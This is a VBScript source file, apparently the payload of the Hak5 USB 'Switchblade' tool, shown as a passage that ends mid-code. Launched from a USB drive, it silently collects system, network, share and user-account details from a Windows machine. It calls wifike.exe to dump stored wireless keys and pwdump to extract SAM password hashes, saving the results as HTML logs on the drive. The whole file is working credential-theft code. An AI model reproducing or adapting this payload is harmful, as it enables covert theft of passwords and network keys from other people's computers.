<CD>\System\src\payload.vbs
On Error Resume Next
Dim ArgObj, fd, U3, strComputerName, strLogPath, strIncludePath, strUserName
Dim strDate, strTime, objTextFile
Dim objNet, objFSO, oExec, objShell, objLeftFile, objRightFile, OS, Sleepms, isAdmin
Set ArgObj = WScript.Arguments
Set objNet = CreateObject("WScript.NetWork")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Const FOR_READING = 1
Const FOR_APPENDING = 8
Const FOR_WRITING = 2
Const ssfHISTORY = 34
' Create constants for access rights and registry hive
const KEY_QUERY_VALUE = &H0001
const KEY_SET_VALUE = &H0002
const KEY_CREATE = &H0032
const KEY_CREATE_SUB_KEY = &H0004
const KEY_DELETE = &H00010000
const HKEY_LOCAL_MACHINE = &H80000002
'fd ="c:\"
'U3 = "c:\System\SRC"
fd=ArgObj(0) & "\"
U3=ArgObj(1) & "\System\SRC"
strOS = ArgObj(2)
Set ArgObj = Nothing
strComputerName = objNet.ComputerName
strUserName = objNet.UserName
strDomain = objNet.UserDomain
Set objNet = Nothing
strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
'Month/Day/Year
strFormDate = Right("0" & Month(now()), 2) & "\" & Right("0" & Day(now()), 2) & "\" & Year(now())
'HH:MM:SS
strFormTime = Right("0" & Hour(now()), 2) & ":" & Right("0" & Minute(now()), 2) & ":" & Right("0" & Second(now()), 2)
'Change Directory
objShell.CurrentDirectory = U3
strIniFile = fd & "System\SRC\payload.ini"
strLogPath = fd & ReadINI("Log Path","Dir",strIniFile) & "\" & strComputerName
strCurLog = strLogPath & "\" & strDate & "-" & strTime
'SET LOG PATHS
If not objFSO.FolderExists(strLogPath) Then
objFSO.CreateFolder strLogPath
End If
If Not objFSO.FolderExists(strCurLog) Then
objFSO.CreateFolder strCurLog
End if
strhtmFile = strLogPath & "\" & strComputerName & "-[" & strDate & "-" & strTime & "].html"
strlhtmFile = strCurLog & "\left-[" & strDate & "-" & strTime & "].html"
strrhtmFile = strCurLog & "\right-[" & strDate & "-" & strTime & "].html"
strtmpFile = strLogPath & "\" & strComputerName & ".tmp"
strFireFile = strLogPath & "\" & strComputerName & ".fire"
winaud = ReadINI("Win Audit","cmdline",strIniFile)
nirtone1 =ReadINI("Nirtone","Tone_1",strIniFile)
nirtone2 =ReadINI("Nirtone","Tone_2",strIniFile)
'LEFT PANEL HTML - LIST
Set objLeftFile = objFSO.CreateTextFile(strlhtmFile)
objLeftFile.Close
Set objLeftFile = objFSO.OpenTextFile(strlhtmFile,FOR_APPENDING)
objLeftFile.WriteLine"<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""> "
objLeftFile.WriteLine"<html><head><title>" & strComputerName & "</title> "
objLeftFile.WriteLine"<meta name=""generator"" content=""SwitchBlade""><meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""><style type=""text/css""> "
objLeftFile.WriteLine"<!-- "
objLeftFile.WriteLine"body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center "
objLeftFile.WriteLine"{ "
objLeftFile.WriteLine"font-family: verdana, sans-serif, arial, helvetica; "
objLeftFile.WriteLine"font-size: 11px; "
objLeftFile.WriteLine"} "
objLeftFile.WriteLine"a "
objLeftFile.WriteLine"{ "
objLeftFile.WriteLine"text-decoration: underline; "
objLeftFile.WriteLine"} "
objLeftFile.WriteLine"a:hover "
objLeftFile.WriteLine"{ "
objLeftFile.WriteLine"color: #ff9900; "
objLeftFile.WriteLine"text-decoration: underline; "
objLeftFile.WriteLine"} "
objLeftFile.WriteLine"<!-- Document Style --> "
objLeftFile.WriteLine"--> "
objLeftFile.WriteLine"</style></head> "
objLeftFile.WriteLine"<body topmargin=""0"" leftmargin=""0"" style=""background-color: rgb(219, 217, 202);"" vlink=""#0000ff""><table style=""width: 500px;"" border=""0""><tbody><tr><td style=""background-color: rgb(204, 102, 0);""><b><font color=""#ffffff"">" & strComputerName & "</font></b></td></tr> "
'::MAIN HTML - OPENS LEFT AND RIGHT PANELS"
Set objTextFile = objFSO.CreateTextFile(strhtmFile)
objTextFile.Close
Set objTextFile = objFSO.OpenTextFile(strhtmFile,FOR_APPENDING)
objTextFile.WriteLine"<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""> "
objTextFile.WriteLine"<html><head> "
objTextFile.WriteLine" "
objTextFile.WriteLine"<title>Switchblade Audit " & strComputerName & "</title><meta name=""generator"" content=""SwitchBlade""> "
objTextFile.WriteLine"<meta name=""author"" content=""Hak.5""> "
objTextFile.WriteLine"<meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""> "
objTextFile.WriteLine"<style type=""text/css""> "
objTextFile.WriteLine"<!-- "
objTextFile.WriteLine"body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center "
objTextFile.WriteLine"{ "
objTextFile.WriteLine" font-family: verdana, sans-serif, arial, helvetica; "
objTextFile.WriteLine" font-size: 11px;} "
objTextFile.WriteLine"a "
objTextFile.WriteLine"{ "
objTextFile.WriteLine" text-decoration: none; "
objTextFile.WriteLine"} "
objTextFile.WriteLine"a:hover "
objTextFile.WriteLine"{ "
objTextFile.WriteLine" color: #ff9900; "
objTextFile.WriteLine" text-decoration: underline; "
objTextFile.WriteLine"} "
objTextFile.WriteLine"--> "
objTextFile.WriteLine"</style></head> "
objTextFile.WriteLine""
objTextFile.WriteLine"<frameset cols=""20%, *""><frame name=""left"" src=""" & ".\" & strDate & "-" & strTime & "\left-[" & strDate & "-" & strTime & "].html" & """><frame name=""right"" src=""" & ".\" & strDate & "-" & strTime & "\right-[" & strDate & "-" & strTime & "].html" & """></frameset></html> "
objTextFile.Close
Set objTextFile = Nothing
Set objRightFile = objFSO.CreateTextFile(strrhtmFile)
objRightFile.Close
Set objRightFile = objFSO.OpenTextFile(strrhtmFile,FOR_APPENDING)
'::RIGHT PANEL HTML - The Good stuff
objRightFile.WriteLine" <!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN"">"
objRightFile.WriteLine" <html><head> "
objRightFile.WriteLine" <meta name=""generator"" content=""SwitchBlade""><meta name=""author"" content=""Hak.5""><meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""><style type=""text/css""> "
objRightFile.WriteLine" <!-- "
objRightFile.WriteLine" body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center "
objRightFile.WriteLine" { "
objRightFile.WriteLine" font-family: verdana, sans-serif, arial, helvetica; "
objRightFile.WriteLine" font-size: 11px; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" a "
objRightFile.WriteLine" { "
objRightFile.WriteLine" text-decoration: none; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" a:hover "
objRightFile.WriteLine" { "
objRightFile.WriteLine" color: #ff9900; "
objRightFile.WriteLine" text-decoration: underline; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" table "
objRightFile.WriteLine" { "
objRightFile.WriteLine" border-color: #006699; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" td "
objRightFile.WriteLine" { "
objRightFile.WriteLine" border-color: #006699; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" td.colhead "
objRightFile.WriteLine" { "
objRightFile.WriteLine" background-color: #99ccff; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" td.hilitebg "
objRightFile.WriteLine" { "
objRightFile.WriteLine" background-color: #f2f2f2; "
objRightFile.WriteLine" } "
objRightFile.WriteLine" --> "
objRightFile.WriteLine" </style></head> "
objRightFile.WriteLine" "
objRightFile.WriteLine" <body><a name=""doc_top""></a><table align=""right"" border=""0"" rules=""none""><tbody><tr><td align=""right""></td> "
objRightFile.WriteLine" </tr></tbody></table><p> </p> "
objRightFile.WriteLine" <center><p><font size=""4""><b>Computer Audit :: " & strFormDate & " " & strFormTime & "</b></font></p><br> "
'+----------------------------------+
'+ [Setup] +
'+----------------------------------+
Sleepms = ReadINI("Variables","Timer",strIniFile)
Set objReg=GetObject("winmgmts:"_
& "{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet"
isAdmin = False
' Does the account under which the script runs have the
' right to query the SYSTEM\CurrentControlSet key
objReg.CheckAccess HKEY_LOCAL_MACHINE, strKeyPath, _
DELETE, isAdmin
':: PAYLOAD
If ReadINI("System Info","Enable",strIniFile) Then
'+----------------------------------+
'+ [BIOS] +
'+----------------------------------+
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_0"" target=""right"">BIOS Overview</a></b></td></tr>"
objRightFile.WriteLine"<p><a name=""cat_0""></a><font size=""5""><b>System Overview</b></font></p><p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><font size=""3""><b>BIOS Overview</b></font>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Item</b></td>" & _
"<td class=""colhead""><b>Value</b></td></tr>"
Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colBIOS = objWMIService.ExecQuery("Select * from Win32_BIOS")
For Each objBIOS in colBIOS
objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>" & objBIOS.BuildNumber & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Current Language</b></td><td>" & objBIOS.CurrentLanguage & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Manufacturer</b></td><td>" & objBIOS.Manufacturer & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Name</b></td><td>"& objBIOS.Name & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Primary BIOS</b></td><td>" & objBIOS.PrimaryBIOS & "</td></tr>"
dtmConvertedDate.Value = objBIOS.ReleaseDate
dtmReleaseDate = dtmConvertedDate.GetVarDate
objRightFile.WriteLine "<tr><td><b>Release Date</b></td><td>" & dtmReleaseDate & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objBIOS.SerialNumber & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>SMBIOS Version</b></td><td>" & objBIOS.SMBIOSVersion & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>SMBIOS Major Version</b></td><td>" & objBIOS.SMBIOSMajorVersion & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>SMBIOS Minor Version</b></td><td>" & objBIOS.SMBIOSMinorVersion & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>SMBIOS Present?</b></td><td>" & objBIOS.SMBIOSPresent & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Status</b></td><td>" & objBIOS.Status & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objBIOS.Version & "</td></tr>" & _
"</td></tr>"
Next
Set dtmConvertedDate = Nothing
Set objWMIService = Nothing
Set colBIOS = Nothing
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
'+----------------------------------+
'+ [System info] +
'+----------------------------------+
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_1"" target=""right"">OS OverView</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_1""></a><font size=""3""><b>OS Overview</b></font></p><p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Item</b></td>" & _
"<td class=""colhead""><b>Value</b></td></tr>"
Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOS in colOSes
objRightFile.WriteLine "<tr><td><b>Logged On User</b></td><td>" & strUserName & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Computer Name</b></td><td>" & objOS.CSName & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Domain</b></td><td>" & strDomain & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Caption</b></td><td>" & objOS.Caption & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>"& objOS.BuildNumber & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Build Type</b></td><td>" & objOS.BuildType & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Boot Device</b></td><td>" & objOS.BootDevice & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Country Code</b></td><td>" & objOS.CCountryCode & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Debug</b></td><td>" & objOS.Debug & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Encryption Level</b></td><td>" & objOS.EncryptionLevel & "</td></tr>"
dtmConvertedDate.Value = objOS.InstallDate
dtmInstallDate = dtmConvertedDate.GetVarDate
objRightFile.WriteLine "<tr><td><b>Install Date</b></td><td>" & dtmInstallDate & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Licensed Users</b></td><td>" & objOS.NumberOfLicensedUsers & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Organization</b></td><td>" & objOS.Organization & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Language</b></td><td>" & objOS.Language & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>OS Type</b></td><td>" & objOS.OSType & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Primary OS</b></td><td>" & objOS.Primary & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Registered User</b></td><td>" & objOS.RegisteredUser & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objOS.SerialNumber & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Other Type Description</b></td><td>" & objOS.OtherTypeDescription & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objOS.Version & "</td></tr>"
objRightFile.WriteLine "<tr><td><b>Service Pack</b></td><td>" & objOS.ServicePackMajorVersion & "." & _
objOS.ServicePackMinorVersion & "</td></tr>"
Next
Set dtmConvertedDate = Nothing
Set objWMIService = Nothing
Set colOSes = Nothing
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colAdapters = objWMIService.ExecQuery _
("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True")
n = 1
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_2"" target=""right"">Network Adapters</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_2""></a><font size=""3""><b>Network Adapters</b></font></p><p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
For Each objAdapter in colAdapters
'Create a table
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Entry Name</b></td>" & _
"<td class=""colhead""><b>"& objAdapter.Description &"</b></td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Adapter Name</b></td><td>"& n &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Adapter Description</b></td><td>"& objAdapter.Description &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>APhysical (MAC) address</b></td><td>"& objAdapter.MACAddress &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Host name</b></td><td>"& objAdapter.DNSHostName &"</td></tr>"
If Not IsNull(objAdapter.IPAddress) Then
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>IP address</b></td><td>"
For i = 0 To UBound(objAdapter.IPAddress)
objRightFile.WriteLine objAdapter.IPAddress(i) & vbCrLf
Next
objRightFile.WriteLine "</td></tr>"
End If
If Not IsNull(objAdapter.IPSubnet) Then
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Subnet</b></td><td>"
For i = 0 To UBound(objAdapter.IPSubnet)
objRightFile.WriteLine objAdapter.IPSubnet(i) & vbCrLf
Next
objRightFile.WriteLine "</td></tr>"
End If
If Not IsNull(objAdapter.DefaultIPGateway) Then
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Default Gateway</b></td><td>"
For i = 0 To UBound(objAdapter.DefaultIPGateway)
objRightFile.WriteLine objAdapter.DefaultIPGateway(i) & vbCrLf
Next
objRightFile.WriteLine "</td></tr>"
End If
If Not IsNull(objAdapter.DNSServerSearchOrder) Then
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS servers in search order</b></td><td>"
For i = 0 To UBound(objAdapter.DNSServerSearchOrder)
objRightFile.WriteLine objAdapter.DNSServerSearchOrder(i) & vbCrLf
Next
objRightFile.WriteLine "</td></tr>"
End If
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS servers in search order</b></td><td>" & objAdapter.DNSDomain & "</td></tr>"
If Not IsNull(objAdapter.DNSDomainSuffixSearchOrder) Then
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS suffix search list</b></td><td>"
For i = 0 To UBound(objAdapter.DNSDomainSuffixSearchOrder)
objRightFile.WriteLine objAdapter.DNSDomainSuffixSearchOrder(i) & vbCrLf
Next
objRightFile.WriteLine "</td></tr>"
End If
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DHCP enabled</b></td><td>"& objAdapter.DHCPEnabled &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DHCP server</b></td><td>"&objAdapter.DHCPServer &"</td></tr>"
If Not IsNull(objAdapter.DHCPLeaseObtained) Then
utcLeaseObtained = objAdapter.DHCPLeaseObtained
strLeaseObtained = WMIDateStringToDate(utcLeaseObtained)
Else
strLeaseObtained = ""
End If
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Lease Obtained</b></td><td>"& strLeaseObtained &"</td></tr>"
If Not IsNull(objAdapter.DHCPLeaseExpires) Then
utcLeaseExpires = objAdapter.DHCPLeaseExpires
strLeaseExpires = WMIDateStringToDate(utcLeaseExpires)
Else
strLeaseExpires = ""
End If
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Lease Expires</b></td><td>"& strLeaseExpires &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Primary WINS Server</b></td><td>"& objAdapter.WINSPrimaryServer &"</td></tr>"
objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Secondary WINS Server</b></td><td>"& objAdapter.WINSSecondaryServer &"</td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table><p> </p>"
n = n + 1
Next
'+----------------------------------+
'+ [Shares] +
'+----------------------------------+
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_4"" target=""right"">System Shares</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_4""></a><font size=""3""><b>System Shares</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
'Create a table
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Allow Maximum</b></td>" & _
"<td class=""colhead""><b>Caption</b></td>" & _
"<td class=""colhead""><b>Maximum Allowed</b></td>" & _
"<td class=""colhead""><b>Name</b></td>" & _
"<td class=""colhead""><b>Path</b></td>" & _
"<td class=""colhead""><b>Type</b></td></tr>"
For each objShare in colShares
objRightFile.WriteLine "<tr><td>" & objShare.AllowMaximum & "</td>"
objRightFile.WriteLine "<td>" & objShare.Caption & "</td>"
objRightFile.WriteLine "<td>" & objShare.MaximumAllowed & "</td>"
objRightFile.WriteLine "<td>" & objShare.Name & "</td>"
objRightFile.WriteLine "<td>" & objShare.Path & "</td>"
objRightFile.WriteLine "<td>" & objShare.Type & "</td></tr>"
Next
Set objWMIService = Nothing
Set colShares = Nothing
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
'+----------------------------------+
'+ [Users] +
'+----------------------------------+
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_5"" target=""right"">System Users</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_5""></a><font size=""3""><b>System Users</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
strLine = ""
If ReadINI("Users","Method",strIniFile) = 1 Then
'Create a table
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Account Type</b></td>" & _
"<td class=""colhead""><b>Caption</b></td>" & _
"<td class=""colhead""><b>Description</b></td>" & _
"<td class=""colhead""><b>Disabled</b></td>" & _
"<td class=""colhead""><b>Domain</b></td>" & _
"<td class=""colhead""><b>Full Name</b></td>" & _
"<td class=""colhead""><b>Local Account</b></td>" & _
"<td class=""colhead""><b>Lockout</b></td>" & _
"<td class=""colhead""><b>Name</b></td>" & _
"<td class=""colhead""><b>Password Changeable</b></td>" & _
"<td class=""colhead""><b>Password Expires</b></td>" & _
"<td class=""colhead""><b>Password Required</b></td>" & _
"<td class=""colhead""><b>SID</b></td>" & _
"<td class=""colhead""><b>SID Type</b></td>" & _
"<td class=""colhead""><b>Status</b></td></tr>"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputerName & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_UserAccount Where LocalAccount = True")
For Each objItem in colItems
objRightFile.WriteLine "<tr><td>" & objItem.AccountType & "</td>"
objRightFile.WriteLine "<td>" & objItem.Caption & "</td>"
objRightFile.WriteLine "<td>" & objItem.Description & "</td>"
objRightFile.WriteLine "<td>" & objItem.Disabled & "</td>"
objRightFile.WriteLine "<td>" & objItem.Domain & "</td>"
objRightFile.WriteLine "<td>" & objItem.FullName & "</td>"
objRightFile.WriteLine "<td>" & objItem.LocalAccount & "</td>"
objRightFile.WriteLine "<td>" & objItem.Lockout & "</td>"
objRightFile.WriteLine "<td>" & objItem.Name & "</td>"
objRightFile.WriteLine "<td>" & objItem.PasswordChangeable & "</td>"
objRightFile.WriteLine "<td>" & objItem.PasswordExpires & "</td>"
objRightFile.WriteLine "<td>" & objItem.PasswordRequired & "</td>"
objRightFile.WriteLine "<td>" & objItem.SID & "</td>"
objRightFile.WriteLine "<td>" & objItem.SIDType & "</td>"
objRightFile.WriteLine "<td>" & objItem.Status & "</td></tr>"
Next
else
'Create a table
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Name</b></td>" & _
"<td class=""colhead""><b>Full Name</b></td>" & _
"<td class=""colhead""><b>Description</b></td>" & _
"<td class=""colhead""><b>Lockout</b></td>" & _
"<td class=""colhead""><b>Disabled</b></td>" & _
"<td class=""colhead""><b>Admin?</b></td></tr>"
Set objComputer = GetObject("WinNT://.")
objComputer.Filter = Array( "User" )
'Set objGroup = GetObject("WinNT://./Administrators,group")
For Each objItem In objComputer
objRightFile.WriteLine "<tr><td>" & objItem.Name & "</td>"
objRightFile.WriteLine "<td>" & objItem.FullName & "</td>"
objRightFile.WriteLine "<td>" & objItem.Description & "</td>"
objRightFile.WriteLine "<td>" & objItem.IsAccountLocked & "</td>"
objRightFile.WriteLine "<td>" & objItem.AccountDisabled & "</td>"
strIsAdmin = "?"
objRightFile.WriteLine "<td>" & strIsAdmin & "</td></tr>"
Next
End If
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
' +----------------------------------+
' + [External IP] +
' +----------------------------------+
If ReadINI("External IP","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_6"" target=""right"">External IP</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_6""></a><font size=""3""><b>External IP</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>IP</b></td></tr>"
URL= ReadINI("External IP","url",strIniFile)
If ReadINI("External IP","Method",strIniFile) = 1 Then
Set http = CreateObject("Microsoft.XmlHttp")
http.open "GET", URL, FALSE
http.send ""
strResponse = RemoveHTML(http.responseText)
Set http = Nothing
Else
objShell.Exec("wget.exe " & URL & "--output-document=" & strtmpFile)
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strResponse = RemoveHTML(objTextFile.ReadLine)
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End if
End If
objRightFile.WriteLine "<tr><td>" & Right(strResponse, Len(strResponse) - InStr(strResponse,":")) & "</td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
' +----------------------------------+
' + [VNC] +
' +----------------------------------+
If ReadINI("VNC","Enable",strIniFile) Then
'Not Implemented
End If
' +----------------------------------+
' + [HakSaw] +
' +----------------------------------+
If ReadINI("Haksaw","Enable",strIniFile) Then
'Not Implemented
End if
' +----------------------------------+
' + [Dump Wifi Hex] +
' +----------------------------------+
If ReadINI("WIFI Key","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_7"" target=""right"">Wireless Hex</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_7""></a><font size=""3""><b>Wireless Key</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "wifike.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End if
End if
' +----------------------------------+
' + [Dump SAM PWDUMP] +
' +----------------------------------+
If ReadINI("SAM PWDUMP","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_8"" target=""right"">SAM PWDUMP</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_8""></a><font size=""3""><b>PWDump</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
If isAdmin then
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Username</b></td>" & _
"<td class=""colhead""><b>UID</b></td>" & _
"<td class=""colhead""><b>Encrypted password</b></td>" & _
"<td class=""colhead""><b>LAN Man Password Hash</b></td>" & _
"<td class=""colhead""><b>Windows NT Password Hash</b></td>" & _
"<td class=""colhead""><b>Full Name and Description</b></td>" & _
"<td class=""colhead""><b>Home directory</b></td></tr>"
objShell.Run "pwdump -o " & strtmpFile & " " & strComputerName , 0, False
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
'// 5 Second Watchdog Timer //
'// //
Secs = Now()
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'pwdump.exe'")
Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'pwdump.exe'")
Loop
If colProcessList.Count <> 0 Then
'kill process it shouldn't run this long
